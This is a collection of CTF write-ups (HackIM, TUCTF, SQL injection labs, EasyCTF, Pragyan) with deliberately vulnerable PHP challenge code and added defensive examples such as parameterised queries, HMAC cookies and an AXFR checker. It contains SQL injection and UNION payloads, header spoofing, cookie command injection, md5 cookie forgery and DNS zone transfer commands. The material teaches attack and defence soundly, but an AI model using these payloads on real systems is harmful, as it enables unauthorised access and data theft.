39 | int i = 0,j=0;
40 |
41 | for( i=0;i < 6 ; i++)for(j=0;j
12 | MmI0YjAzN2ZkMWYzMDM3NWU1Y2Q4NzE0NDhiNWI5NWM= which decodes to the md5 hash 2b4b037fd1f30375e5cd871448b5b95c.
13 |
14 | 
15 |
16 | After getting these values, I tried to curl the flag but I was getting an error message.
17 | I saw a hint on the Nullcon Twitter, 'There's no place like home', and a friend I made during the contest (thanks [@menztrual](https://twitter.com/menztrual) from TheGoonies ;)) cleared my mind:
18 |
19 | curl -v --header "X-Forwarded-For: 127.0.0.1" --data "user=coldplay&pass=paradise" -X POST "http://54.152.19.210/web100/"
20 |
21 | The header X-Forwarded-For was the catch!
22 |
23 | Flag: flag{4f9361b0302d4c2f2eb1fc308587dfd6}
--------------------------------------------------------------------------------
/2017/HackIM/Web/2/README.MD:
--------------------------------------------------------------------------------
1 | # Web2
2 |
3 | ## Description
4 |
5 | There are two kinds of people in this world. One with all the privileges and the others. Can you get the flag by eating some British biscuit?
6 |
7 |
8 | ## Solution
9 |
10 | Same as in Web1: since I took too long to write this, the Nullcon HackIM environment is not available anymore, so I'll just put down the things I remember :D
11 |
12 | The site requires a user and password, and gives us an interface to register one ourselves.
13 | In the challenge description the admin mentioned something about cookies, so here's the logic behind it.
14 | When you log in to the system, it creates two cookies, r and u, and both share a constant prefix, 351e766803.
15 |
16 | ```php
17 | User: pog - Password: pog
18 |
19 | cookie: r = 351e766803 + d63c7ede8cb1e1c8db5e51c63fd47cff (limited)
20 | cookie: u = 351e766803 + 5bb50314c7d970ce6cb07afb583c4c9d (pog)
21 | ```
22 |
23 | Removing this prefix, the remaining part is an md5 hash of the user's access level and of the username, respectively. So, following this approach, I tried generating md5 hashes for unlimited and administrator, and the one that worked was admin! :D
24 |
25 | Flag: flag{1e39bd297a47ed0eeaea9cac7e}
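This cookie and the birthday_invite cookie in the BreakIn write-up above share one defect: the token is an unkeyed md5 of a guessable value, so any client can mint the "admin" or "true" version. Added example (not from either write-up) of the weak scheme beside an HMAC-based one; the server key is constructed, and the 351e766803 prefix is the one seen in this challenge.

```python
import hashlib
import hmac

# Constant cookie prefix observed in the Web2 challenge
PREFIX = "351e766803"
# Constructed server-side secret; the challenges had nothing like it, which is the bug
SERVER_KEY = b"constructed-demo-key-do-not-reuse"
ROLES = ("limited", "unlimited", "admin")


def weak_role_cookie(role):
    """Web2 scheme as described: prefix + md5(role). Anyone can compute it."""
    return PREFIX + hashlib.md5(role.encode()).hexdigest()


def weak_role_from_cookie(cookie):
    """Server side of the weak scheme: match the digest against the known roles.
    A client-side cookie built with weak_role_cookie("admin") passes this check."""
    for role in ROLES:
        if weak_role_cookie(role) == cookie:
            return role
    return None


def keyed_role_cookie(role, key=SERVER_KEY):
    """Hardened scheme: prefix.role.HMAC-SHA256(key, role). The role stays
    readable, but the tag cannot be produced without the server key."""
    tag = hmac.new(key, role.encode(), hashlib.sha256).hexdigest()
    return "%s.%s.%s" % (PREFIX, role, tag)


def keyed_role_from_cookie(cookie, key=SERVER_KEY):
    """Return the role only if the tag verifies under the server key."""
    try:
        prefix, role, tag = cookie.split(".")
    except ValueError:
        return None
    if prefix != PREFIX:
        return None
    expected = hmac.new(key, role.encode(), hashlib.sha256).hexdigest()
    # Constant-time comparison, so a forger learns nothing from response timing
    return role if hmac.compare_digest(expected, tag) else None


def md5_flag_token(value):
    """The birthday challenge's cookie: an unkeyed md5 of "false" or "true"."""
    return hashlib.md5(value.encode()).hexdigest()
```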
--------------------------------------------------------------------------------
/2017/README.md:
--------------------------------------------------------------------------------
1 | # Writeups 2017
2 |
3 | @pogTeam's writeups collections.
4 |
5 |
--------------------------------------------------------------------------------
/2017/TUCTF/cookieHarrelson/README.md:
--------------------------------------------------------------------------------
1 | # Cookie Harrelson (200pts)
2 |
3 | ## Description
4 |
5 | ~~~
6 | Woody Harrelson has decided to take up web dev after learning about Cookies. Show him that he should go back to killing zombies.
7 |
8 | Note: index.txt is what is being displayed on the page.
9 |
10 | http://cookieharrelson.tuctf.com
11 | ~~~
12 |
13 | ## Solution
14 |
15 | We start by looking at the cookies with the CookieMonster extension. In the cookie `tallahassee` there is a URL-encoded, base64-encoded text:
16 |
17 | cat index.txt
18 |
19 | We first tried editing this cookie to `cat flag` or `cat flag.txt`. After refreshing the page, we checked the cookie and found:
20 |
21 | cat index.txt #cat flag
22 |
23 | So our appended command is being commented out, shell-script style. After a lot of thinking and some help from friends, we found the solution with a multi-line command:
24 |
25 | \
26 | cat flag
27 |
28 | After refreshing:
29 |
30 | cat index #\
31 | cat flag
32 |
33 | The flag shows up in the page:
34 |
35 | TUCTF{D0nt_3x3cut3_Fr0m_c00k13s}
36 |
37 | Again, don't!
38 |
--------------------------------------------------------------------------------
/2017/TUCTF/gitGud/README.md:
--------------------------------------------------------------------------------
1 | # Git Gud (100pts)
2 |
3 | ## Description
4 |
5 | Jimmy has begun learning about Version Control Systems and decided it was a good time to put it into use for his person website. Show him how to Git Gud.
6 |
7 | http://gitgud.tuctf.com
8 |
9 | ## Solution
10 |
11 | The challenge gives a URL with apparently nothing useful. Because of the title, we thought about a git repo somewhere in this domain. We found it manually at:
12 |
13 | http://gitgud.tuctf.com/.git
14 |
15 | The biggest difficulty was downloading the repo, since `git clone` did not work. So we downloaded it recursively with:
16 |
17 | $ wget -r http://gitgud.tuctf.com/.git
18 |
19 | In the `.git/logs` folder we could see that the flag was added in commit `4fa0acbccd0885dace2f111f2bd7a120abc0fb4e`:
20 |
21 | However, before checking out into this commit, we needed to stash the changes:
22 |
23 | $ git stash
24 |
25 | Now we were able to:
26 |
27 | $ git checkout 4fa0acbccd0885dace2f111f2bd7a120abc0fb4
28 | HEAD is now at 4fa0acb... Added flag
29 |
30 | Finally:
31 |
32 | ~~~
33 | $ git show
34 | commit 4fa0acbccd0885dace2f111f2bd7a120abc0fb4e
35 | Author: Jimmy
36 | Date: Tue Nov 21 20:47:00 2017 +0000
37 |
38 | Added flag
39 |
40 | diff --git a/flag b/flag
41 | new file mode 100644
42 | index 0000000..1b8dce4
43 | --- /dev/null
44 | +++ b/flag
45 | @@ -0,0 +1,2 @@
46 | +
47 | +TUCTF{D0nt_M4k3_G1t_Publ1c}
48 | ~~~
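Review bot: the `+TUCTF{D0nt_M4k3_G1t_Publ1c}` line commits a secret into the repository as a plain file, and with `.git` reachable over HTTP the object store hands it to anyone, as the `wget -r` above showed; the secret belongs in an ignored config file or a secret store, and once it has been committed to an exposed repo the only real fix is to rotate it, since rewriting history does not help after it has been fetched. The empty first `+` line also means the file starts with a blank line.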
49 |
50 | So, yeah, just don't do it :)
51 |
--------------------------------------------------------------------------------
/2017/sqlinjChalls/README.md:
--------------------------------------------------------------------------------
1 | # SQL injection challs by @corb3nik.
2 | ## Writeups by @pogTeam.
3 |
4 | Original URL
5 |
6 | http://159.203.173.168:12000/
7 |
--------------------------------------------------------------------------------
/2017/sqlinjChalls/level1/README.md:
--------------------------------------------------------------------------------
1 | My friend created a website where we can store secrets... Unfortunately, we can only see our own. Help me find all of my friend's secrets.
2 |
3 | 
4 |
5 | Really simple stuff. Just a place to insert a 'secret' and another to retrieve it.
6 |
7 | Just a mainstream
8 |
9 | ' or 1=1 --
10 |
11 | instead of the session ID should do it.
12 |
13 | ## Why it works
14 |
15 | The nice thing about these challs is that they all give you the source code. This would spoil a real CTF chall, but it is great for learning purposes.
16 |
17 | The vulnerability we exploited is in this snippet below.
18 |
19 | ~~~~
20 |
21 | if (isset($_POST['session_id'])) {
22 |     $query = "SELECT * FROM secrets WHERE session_id = '" . $_POST['session_id'] . "'";
23 |     $result = $conn->query($query);
24 | }
25 | ~~~~
26 |
27 | Yep, no input sanitization. Our 'session_id' field is inserted directly into the query, allowing us to pass some malicious code. In this case we build a new query that bypasses the session_id check:
28 |
29 | "SELECT * FROM secrets WHERE session_id = '" ."' or 1=1 -- " . "'";
30 |
31 | Note that we needed to append `-- ` to our parameter. The `--` is necessary to comment out the rest of the query (the closing quote the code adds), so that makes sense. Nevertheless, we also needed a trailing blank space: MySQL only treats `--` as the start of a comment when it is followed by whitespace, so without it the query is invalid.
32 |
--------------------------------------------------------------------------------
/2017/sqlinjChalls/level1/level1.php:
--------------------------------------------------------------------------------
<?php
if (isset($_GET['source'])) {
die(highlight_file(__FILE__));
}
require("conf/level1.conf.php");
error_reporting(0);
session_start();
if (isset($_POST['secret'])) {
$query = $conn->prepare("INSERT INTO secrets(session_id, secret) VALUES (?, ?)");
$current_session_id = session_id();
$query->bind_param('ss', $current_session_id, $_POST['secret']);
$query->execute();
}
if (isset($_POST['session_id'])) {
$query = "SELECT * FROM secrets WHERE session_id = '" . $_POST['session_id'] . "'";
$result = $conn->query($query);
} else {
$query = "SELECT * FROM secrets WHERE session_id = '" . session_id() . "'";
$result = $conn->query($query);
}
?>
<!DOCTYPE HTML>
<html>
<head>
<link href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css" rel="stylesheet" integrity="sha384-BVYiiSIFeK1dGmJRAkycuHAHRg32OmUcww7on3RYdg4Va+PmSTsz/K68vbdEjh4u" crossorigin="anonymous">
</head>
<body>
<div id="custom-bootstrap-menu" class="navbar navbar-default " role="navigation">
<div class="container-fluid">
<div class="navbar-header"><a class="navbar-brand" href="#">Secret Diary</a>
<button type="button" class="navbar-toggle" data-toggle="collapse" data-target=".navbar-menubuilder"><span class="sr-only">Toggle navigation</span><span class="icon-bar"></span><span class="icon-bar"></span><span class="icon-bar"></span>
</button>
</div>
<div class="collapse navbar-collapse navbar-menubuilder">
<ul class="nav navbar-nav navbar-left">
<li><a href="#">Home</a>
</li>
</ul>
</div>
</div>
</div>
<div class="container-fluid">
<?php
if (isset($_POST['secret'])) {
echo '<div class="alert alert-success" role="alert">Secret added successfully. You can view your secrets with the following session ID : '. session_id() .'</div>';
}
?>
<div class="row">
<div class="col-md-2"></div>
<div class="col-md-4">
<form method="POST" action="/level1.php">
<div class="input-group">
<input type="text" name="session_id" class="form-control" placeholder="Your session ID" aria-describedby="basic-addon2">
<span class="input-group-btn">
<button class="btn btn-default" type="submit">Get your secrets!</button>
</span>
</div>
</form>
</div>
<div class="col-md-4">
<form method="POST" action="/level1.php">
<div class="input-group">
<input type="text" name="secret" class="form-control" placeholder="Your secret" aria-describedby="basic-addon2">
<span class="input-group-btn">
<button class="btn btn-default" type="submit">Add a new secret!</button>
</span>
</div>
</form>
</div>
<div class="col-md-2"></div>
</div>
</div>
<br/>
<br/>
<br/>
<div class="container-fluid">
<div class="row">
<div class="col-md-4"></div>
<div class="col-md-4">
<div class="panel panel-default">
<div class="panel-heading">Your secrets</div>
<!-- Table -->
<table class="table">
<?php
if (isset($result) && $result->num_rows > 0) {
// output data of each row
while($row = $result->fetch_assoc()) {
echo "<tr><td>" . htmlspecialchars($row['secret']) . "</td></tr>";
}
} else {
echo "<tr><td>You don't have any secrets yet.</td></tr>";
}
?>
</table>
</div>
</div>
<div class="col-md-4"></div>
</div>
</div>
<script
src="https://code.jquery.com/jquery-3.1.1.min.js"
integrity="sha256-hVVnYaiADRTO2PzUGmuLJr8BLUSjGIZsDYGmIJLv2b8="
crossorigin="anonymous"></script>
<script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js"></script>
</body>
</html>
--------------------------------------------------------------------------------
/2017/sqlinjChalls/level1/level1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/pogTeam/writeups/cd97b42a95d0c24fa51843f31c842579395ae7cb/2017/sqlinjChalls/level1/level1.png
--------------------------------------------------------------------------------
/2017/sqlinjChalls/level2/README.md:
--------------------------------------------------------------------------------
1 | I think an administrator blocked my account. Can you help me steal someone else's account?
2 |
3 | Note: There are two flags in this challenge.
4 |
5 | 
6 |
7 | Again, we started trying basic stuff:
8 |
9 | user: ' or 1=1 --
10 | pass: ' or 1=1 --
11 |
12 | And guess what, it partially worked!
13 |
14 | 
15 |
16 | Now, for the second flag:
17 |
18 | user: ' UNION SELECT flag FROM my_secret_table --
19 | pass: ' anything
20 |
21 | 
22 |
23 | There you go :)
24 |
25 | ## Why it works
26 |
27 | First thing to notice while skimming the code is this comical (and sad) comment:
28 |
29 | // $query = "SELECT flag FROM my_secret_table"; We leave commented code in production because we're cool.
30 |
31 | Right after it:
32 |
33 | $query = "SELECT username FROM users where username = '" . $_POST['username'] . "' and password = ?";
34 |
35 | Later in the code we see the logic used to validate the user.
36 |
37 | ~~~~
38 | // Bind password param
39 | $query->bind_param("s", $_POST['password']);
40 | $query->execute();
41 | $query->bind_result($user);
42 | $query->fetch();
43 |
44 | // Check if a valid user has been found
45 | if ($user != NULL) {
46 | session_start();
47 | $_SESSION['is_logged_in'] = true;
48 | $_SESSION['username'] = $user;
49 | } else {
50 | $error = true;
51 | $error_msg = "Wrong! Username/Password is invalid.";
52 | }
53 | ~~~~
54 |
55 | The password field is first bound to the query. Then it is executed, saving the result in the $user variable. If any user is found, you are in and your flag is printed. Note that preparing the statement only protects the password placeholder: the username was already concatenated into the SQL string before prepare() ran, so that part of the query is still injectable.
56 |
57 | Our final query then is:
58 |
59 | "SELECT username FROM users where username = '' UNION SELECT flag FROM my_secret_table -- ' and password = anything"
60 |
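The two query-building patterns from level1.php and level2.php, rebuilt as an added example on an in-memory SQLite database (illustrative code, not the challenge's or pogTeam's), each next to a fully parameterised version. The table contents and the `FLAG{constructed_placeholder}` value are constructed sample data; it shows why the level 2 prepare() did not help, since only the `?` placeholder is ever bound.

```python
import sqlite3


def make_db():
    """Constructed sample data standing in for the challenge's tables."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE secrets(session_id TEXT, secret TEXT);
        INSERT INTO secrets VALUES ('abc123', 'my own secret');
        INSERT INTO secrets VALUES ('def456', 'friend secret 1');
        INSERT INTO secrets VALUES ('ghi789', 'friend secret 2');
        CREATE TABLE users(username TEXT, password TEXT);
        INSERT INTO users VALUES ('admin', 'hunter2');
        CREATE TABLE my_secret_table(flag TEXT);
        INSERT INTO my_secret_table VALUES ('FLAG{constructed_placeholder}');
    """)
    return conn


# ---- level 1: string concatenation vs. a bound parameter -------------------

def level1_vulnerable(conn, session_id):
    """Mirrors level1.php: the POSTed session_id is pasted into the SQL."""
    query = "SELECT secret FROM secrets WHERE session_id = '" + session_id + "'"
    return [row[0] for row in conn.execute(query)]


def level1_fixed(conn, session_id):
    """Same lookup with a placeholder: the input is data, never SQL."""
    query = "SELECT secret FROM secrets WHERE session_id = ?"
    return [row[0] for row in conn.execute(query, (session_id,))]


# ---- level 2: prepare() after concatenation protects only the placeholder --

def level2_vulnerable(conn, username, password):
    """Mirrors level2.php: username is concatenated *before* the statement is
    prepared, so only the password ever becomes a real parameter.  When the
    injected '--' comments the '?' away, mysqli's bind_param() fails (hidden
    by error_reporting(0)) and execute() still runs the statement, which is
    why the writeup's password can be anything.  sqlite3 raises on the
    binding mismatch instead, so that behaviour is emulated by retrying."""
    query = ("SELECT username FROM users WHERE username = '" + username
             + "' AND password = ?")
    try:
        cur = conn.execute(query, (password,))
    except sqlite3.ProgrammingError:        # placeholder was commented out
        cur = conn.execute(query)
    row = cur.fetchone()
    return row[0] if row else None


def level2_fixed(conn, username, password):
    """Both values bound: the UNION text is compared as a literal username."""
    query = "SELECT username FROM users WHERE username = ? AND password = ?"
    row = conn.execute(query, (username, password)).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    db = make_db()
    bypass = "' or 1=1 -- "
    union = "' UNION SELECT flag FROM my_secret_table -- "
    print("level1 vulnerable:", level1_vulnerable(db, bypass))   # every row
    print("level1 fixed:     ", level1_fixed(db, bypass))        # []
    print("level2 vulnerable:", level2_vulnerable(db, union, "anything"))
    print("level2 fixed:     ", level2_fixed(db, union, "anything"))  # None
```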
--------------------------------------------------------------------------------
/2017/sqlinjChalls/level2/flag1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/pogTeam/writeups/cd97b42a95d0c24fa51843f31c842579395ae7cb/2017/sqlinjChalls/level2/flag1.png
--------------------------------------------------------------------------------
/2017/sqlinjChalls/level2/flag2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/pogTeam/writeups/cd97b42a95d0c24fa51843f31c842579395ae7cb/2017/sqlinjChalls/level2/flag2.png
--------------------------------------------------------------------------------
/2017/sqlinjChalls/level2/level2.php:
--------------------------------------------------------------------------------
<?php
if (isset($_GET['source'])) {
die(highlight_file(__FILE__));
}
require("conf/level2.conf.php");
error_reporting(0);
if (isset($_POST['username']) && isset($_POST['password'])) {
// $query = "SELECT flag FROM my_secret_table"; We leave commented code in production because we're cool.
$query = "SELECT username FROM users where username = '" . $_POST['username'] . "' and password = ?";
// We use prepared statements, it must be secure.
$query = $conn->prepare($query);
// If query is invalid
if ($query === false) {
$error = true;
$error_msg = "<strong>Error!</strong> Invalid SQL query";
} else {
// Bind password param
$query->bind_param("s", $_POST['password']);
$query->execute();
$query->bind_result($user);
$query->fetch();
// Check if a valid user has been found
if ($user != NULL) {
session_start();
$_SESSION['is_logged_in'] = true;
$_SESSION['username'] = $user;
} else {
$error = true;
$error_msg = "<strong>Wrong!</strong> Username/Password is invalid.";
}
}
}
?>
<!DOCTYPE HTML>
<html>
<head>
<link href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css" rel="stylesheet" integrity="sha384-BVYiiSIFeK1dGmJRAkycuHAHRg32OmUcww7on3RYdg4Va+PmSTsz/K68vbdEjh4u" crossorigin="anonymous">
<style>
.corb-body { background-color: #333;}
.centered {
position: fixed;
top: 50%;
left: 50%;
/* bring your own prefixes */
transform: translate(-50%, -50%);
}
.corb-login-length { width: 500px;}
.corb-submit { position: relative; left: auto; right: -420px;}
.corb-flag { color: #0F0; }
.corb-alert { margin-top: 20px; }
</style>
</head>
<body class="corb-body container-fluid">
<?php if ($_SESSION['is_logged_in'] !== true) { ?>
<?php if (isset($error) && $error === true) { ?>
<div class="container-fluid corb-alert">
<div class="alert alert-danger">
<?php echo $error_msg; ?>
</div>
</div>
<?php } ?>
<div class="row">
<div class="centered">
<div class="well">
<h3 class="corb-login-length">Login If You Can</h3>
<br/>
<form method="POST">
<input name="username" class="form-control" type="text" placeholder="username">
<br/>
<input name="password" class="form-control" type="text" placeholder="password">
<br/>
<input name="submit" class="corb-submit btn btn-primary btn-lg" type="submit" value="Login">
</form>
</div>
</div>
</div>
<?php }else { ?>
<div class="centered">
<h1 class="corb-flag">Welcome <?php echo $_SESSION['username']; ?>! Here's some green text for you.</h1>
<h1 class="corb-flag"><?php echo $flag; ?></h1>
</div>
<?php } ?>
<script
src="https://code.jquery.com/jquery-3.1.1.min.js"
integrity="sha256-hVVnYaiADRTO2PzUGmuLJr8BLUSjGIZsDYGmIJLv2b8="
crossorigin="anonymous"></script>
<script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js"></script>
</body>
</html>
<?php
session_destroy();
?>
--------------------------------------------------------------------------------
/2017/sqlinjChalls/level2/level2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/pogTeam/writeups/cd97b42a95d0c24fa51843f31c842579395ae7cb/2017/sqlinjChalls/level2/level2.png
--------------------------------------------------------------------------------
/2018/EasyCTF/digging_for_soup.md:
--------------------------------------------------------------------------------
1 | ~~~
2 | Perhaps this time I'll have hidden things a little better... you won't find my flag so easily now! nicebowlofsoup.com
3 | HINT: How do slave zones know when updates are made to the master?
4 | ~~~
5 |
6 | First thing to notice here is that accessing `nicebowlofsoup.com` leads to a 404 error. According to the hint and the title, the solution probably relies on `dig` and `zone transfers`.
7 |
8 | Let's give it a first try.
9 |
10 | ~~~
11 | $ dig nicebowlofsoup.com any
12 |
13 | ; <<>> DiG 9.10.3-P4-Debian <<>> nicebowlofsoup.com any
14 | ;; global options: +cmd
15 | ;; Got answer:
16 | ;; ->>HEADER<<- opcode: QUERY, status: SERVFAIL, id: 2135
17 | ;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1
18 |
19 | ;; OPT PSEUDOSECTION:
20 | ; EDNS: version: 0, flags:; udp: 4096
21 | ;; QUESTION SECTION:
22 | ;nicebowlofsoup.com.            IN      ANY
23 |
24 | ;; Query time: 17 msec
25 | ;; SERVER: 2804:14c:6510:672:189:6:0:182#53(2804:14c:6510:672:189:6:0:182)
26 | ;; WHEN: Mon Feb 12 18:08:36 -02 2018
27 | ;; MSG SIZE rcvd: 47
28 | ~~~
29 |
30 | Nice, an IPv6 server address! So now we can query this server using the `-6` option.
31 |
32 | ~~~
33 | $ dig -6 @2804:14c:6510:672:189:6:0:182 nicebowlofsoup.com any
34 |
35 | ; <<>> DiG 9.10.3-P4-Debian <<>> -6 @2804:14c:6510:672:189:6:0:182 nicebowlofsoup.com any
36 | ; (1 server found)
37 | ;; global options: +cmd
38 | ;; Got answer:
39 | ;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 6071
40 | ;; flags: qr rd ra; QUERY: 1, ANSWER: 4, AUTHORITY: 2, ADDITIONAL: 1
41 |
42 | ;; OPT PSEUDOSECTION:
43 | ; EDNS: version: 0, flags:; udp: 4096
44 | ;; QUESTION SECTION:
45 | ;nicebowlofsoup.com.            IN      ANY
46 |
47 | ;; ANSWER SECTION:
48 | nicebowlofsoup.com.     100     IN      TXT     "Close, but no cigar... where else could it be? hint: the nameserver's IP is 159.65.43.62"
49 | nicebowlofsoup.com.     86400   IN      SOA     ns1.nicebowlofsoup.com. hostmaster.nicebowlofsoup.com. 2018021205 28800 7200 604800 86400
50 | nicebowlofsoup.com.     170405  IN      NS      ns2.nicebowlofsoup.com.
51 | nicebowlofsoup.com.     170405  IN      NS      ns1.nicebowlofsoup.com.
52 |
53 | ;; AUTHORITY SECTION:
54 | nicebowlofsoup.com.     170405  IN      NS      ns2.nicebowlofsoup.com.
55 | nicebowlofsoup.com.     170405  IN      NS      ns1.nicebowlofsoup.com.
56 |
57 | ;; Query time: 148 msec
58 | ;; SERVER: 2804:14c:6510:672:189:6:0:182#53(2804:14c:6510:672:189:6:0:182)
59 | ;; WHEN: Mon Feb 12 17:54:55 -02 2018
60 | ;; MSG SIZE rcvd: 259
61 | ~~~
62 |
63 | Ok, now that we have the nameserver's IPv4 address, let's try the zone transfer.
64 |
65 | ~~~
66 | $ dig @159.65.43.62 nicebowlofsoup.com axfr
67 |
68 | ; <<>> DiG 9.10.3-P4-Debian <<>> @159.65.43.62 nicebowlofsoup.com axfr
69 | ; (1 server found)
70 | ;; global options: +cmd
71 | nicebowlofsoup.com.     86400   IN      SOA     ns1.nicebowlofsoup.com. hostmaster.nicebowlofsoup.com. 2018021205 28800 7200 604800 86400
72 | easyctf.nicebowlofsoup.com. 10  IN      TXT     "easyctf{why_do_i_even_have_this_domain}"
73 | nicebowlofsoup.com.     100     IN      TXT     "Close, but no cigar... where else could it be? hint: the nameserver's IP is 159.65.43.62"
74 | nicebowlofsoup.com.     86400   IN      SOA     ns1.nicebowlofsoup.com. hostmaster.nicebowlofsoup.com. 2018021205 28800 7200 604800 86400
75 | ;; Query time: 438 msec
76 | ;; SERVER: 159.65.43.62#53(159.65.43.62)
77 | ;; WHEN: Mon Feb 12 18:03:28 -02 2018
78 | ;; XFR size: 4 records (messages 3, bytes 404)
79 | ~~~
80 |
81 | :)
82 |
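An added, stdlib-only check for the misconfiguration this challenge relies on (example code, not from the writeup): it sends the same AXFR request `dig ... axfr` does over TCP and reports whether the server returns the zone or REFUSED, which is what an authoritative server should answer to anyone but its configured secondaries. The function names and the constant tables are this example's own.

```python
import socket
import struct

QTYPE_AXFR = 252
RCODE_NAMES = {0: "NOERROR", 5: "REFUSED", 9: "NOTAUTH"}
TYPE_NAMES = {1: "A", 2: "NS", 6: "SOA", 16: "TXT", 28: "AAAA"}


def encode_name(name):
    """Wire-encode a domain name as length-prefixed labels plus a root byte."""
    labels = name.rstrip(".").split(".")
    return b"".join(bytes([len(l)]) + l.encode() for l in labels) + b"\x00"


def build_axfr_query(zone, txid=0x1234):
    """12-byte header (1 question, no flags) + question for QTYPE=AXFR, IN."""
    header = struct.pack("!HHHHHH", txid, 0, 1, 0, 0, 0)
    return header + encode_name(zone) + struct.pack("!HH", QTYPE_AXFR, 1)


def read_name(msg, off):
    """Decode a possibly compressed name; return (name, offset after it)."""
    labels, jumped, end = [], False, off
    while True:
        length = msg[off]
        if length & 0xC0 == 0xC0:               # 2-byte compression pointer
            if not jumped:
                end = off + 2
            off = struct.unpack("!H", msg[off:off + 2])[0] & 0x3FFF
            jumped = True
            continue
        off += 1
        if length == 0:
            break
        labels.append(msg[off:off + length].decode())
        off += length
    return ".".join(labels) + ".", (end if jumped else off)


def parse_response(msg):
    """Return (rcode_name, [(owner, type_name, rdata), ...]) for one message.
    rdata is kept raw except TXT, whose first <len><chars> string is decoded."""
    _, flags, qd, an, ns, ar = struct.unpack("!HHHHHH", msg[:12])
    rcode = RCODE_NAMES.get(flags & 0xF, str(flags & 0xF))
    off = 12
    for _ in range(qd):                         # skip the echoed question
        _, off = read_name(msg, off)
        off += 4
    records = []
    for _ in range(an + ns + ar):
        owner, off = read_name(msg, off)
        rtype, _, _, rdlen = struct.unpack("!HHIH", msg[off:off + 10])
        off += 10
        rdata = msg[off:off + rdlen]
        off += rdlen
        if rtype == 16:
            rdata = rdata[1:1 + rdata[0]].decode()
        records.append((owner, TYPE_NAMES.get(rtype, str(rtype)), rdata))
    return rcode, records


def recv_exact(sock, n):
    """Read exactly n bytes (TCP DNS frames are length-prefixed)."""
    buf = b""
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise ConnectionError("server closed the connection mid-transfer")
        buf += chunk
    return buf


def check_zone_transfer(server, zone, timeout=5.0):
    """Request a full transfer of `zone` from `server` over TCP (AXFR is
    TCP-only) and return (rcode, records).  A server that hands the zone to
    anyone answers NOERROR with the SOA bracketing every record; a correctly
    restricted one answers REFUSED with no records."""
    query = build_axfr_query(zone)
    records, rcode = [], None
    with socket.create_connection((server, 53), timeout=timeout) as sock:
        sock.sendall(struct.pack("!H", len(query)) + query)
        while True:
            (size,) = struct.unpack("!H", recv_exact(sock, 2))
            rcode, recs = parse_response(recv_exact(sock, size))
            records.extend(recs)
            # the transfer ends when the closing SOA arrives (2 SOAs seen)
            if rcode != "NOERROR" or sum(r[1] == "SOA" for r in records) >= 2:
                break
    return rcode, records
```

Run `check_zone_transfer("ns1.example.org", "example.org")` against your own authoritative server; anything other than REFUSED from an unrelated client means the whole zone is readable by anyone.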
--------------------------------------------------------------------------------
/2018/Pragyan/crypto/xmen_or_the_avengers/README.md:
--------------------------------------------------------------------------------
1 | # Xmen OR the avengers (100pts)
2 |
3 | ~~~
4 | The legion of doom is expecting an impending attack from a group of superheroes. they are not sure if it is the Xmen OR the avengers. They have received some information from a spy, a zip file containing the following files:
5 |
6 | info_crypt.txt
7 |
8 | info_clear.txt
9 |
10 | superheroes_group_info_crypt.txt
11 |
12 | Help the legion of doom in decrypting the last file so they can prepare themselves and prevent their impending doom.
13 | ~~~
14 |
15 | ~~~
16 | import base64
17 | import hashlib
18 | from Crypto.Cipher import AES
19 |
20 | def readfile(path):
21 |     with open(path, 'rb') as f:  # bytes: info_crypt.txt is not valid text
22 |         return f.read()
23 |
24 | def xor(b1, b2):
25 |     # byte-wise XOR, truncated to the shorter input
26 |     return bytes(a ^ b for a, b in zip(b1, b2))
27 |
28 | #read the files
29 | clear = readfile('info_clear.txt')
30 | crypt = readfile('info_crypt.txt')
31 | superhero = base64.b64decode(readfile('superheroes_group_info_crypt.txt'))
32 |
33 | #get the key: known plaintext XOR ciphertext recovers the XOR key
34 | dec = xor(clear, crypt).rstrip(b'\n')
35 | print(dec)
36 | key = hashlib.md5(dec).hexdigest().encode()  # 32 hex chars -> AES-256 key
37 | print(key)
38 |
39 | #decrypt aes-ecb
40 | cipher = AES.new(key, AES.MODE_ECB)
41 | msg = cipher.decrypt(superhero)
42 | print("***POGTEAM*** >> " + msg.decode(errors='replace'))
43 | ~~~
44 |
--------------------------------------------------------------------------------
/2018/Pragyan/crypto/xmen_or_the_avengers/info_clear.txt:
--------------------------------------------------------------------------------
1 | greetings fellow villains, my identity will not be revaled just yet, i am giving you an opportunity to defend yourselves well in advance before your impending doom from the superheroes, i am not exactly with you or agains you, but i very well know that i do want to help you.
2 |
--------------------------------------------------------------------------------
/2018/Pragyan/crypto/xmen_or_the_avengers/info_crypt.txt:
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
/2018/Pragyan/crypto/xmen_or_the_avengers/superheroes_group_info_crypt.txt:
--------------------------------------------------------------------------------
1 | TIOXvVLnSbKhy97xqLy9K661Z937apKw2Oq2D0cyki62fSXi1RSQVP9lLoDPQywq
2 |
--------------------------------------------------------------------------------
/2018/Pragyan/reverse/assemble/README.md:
--------------------------------------------------------------------------------
1 |
2 | # Assemble your way to the flag (50 pts)
3 |
4 | ~~~
5 | My friend was trying out assembly for the first time, he has no clue what he's doing, help him out and procure your reward in the form of a flag :)
6 | ~~~
7 |
8 | ~~~
9 | $ gdb -q ./question
10 | Reading symbols from ./question...(no debugging symbols found)...done.
11 | gdb-peda$ run
12 | Starting program: /home/valle/Downloads/question
13 | Look for something else....
14 | [Inferior 1 (process 1612) exited normally]
15 | Warning: not running or target is remote
16 | gdb-peda$ pdisass main
17 | Dump of assembler code for function main:
18 | 0x00005555555546a0 <+0>: push rbp
19 | 0x00005555555546a1 <+1>: mov rbp,rsp
20 | 0x00005555555546a4 <+4>: lea rdi,[rip+0x2b9] # 0x555555554964
21 | 0x00005555555546ab <+11>: mov eax,0x0
22 | 0x00005555555546b0 <+16>: mov rax,0x50
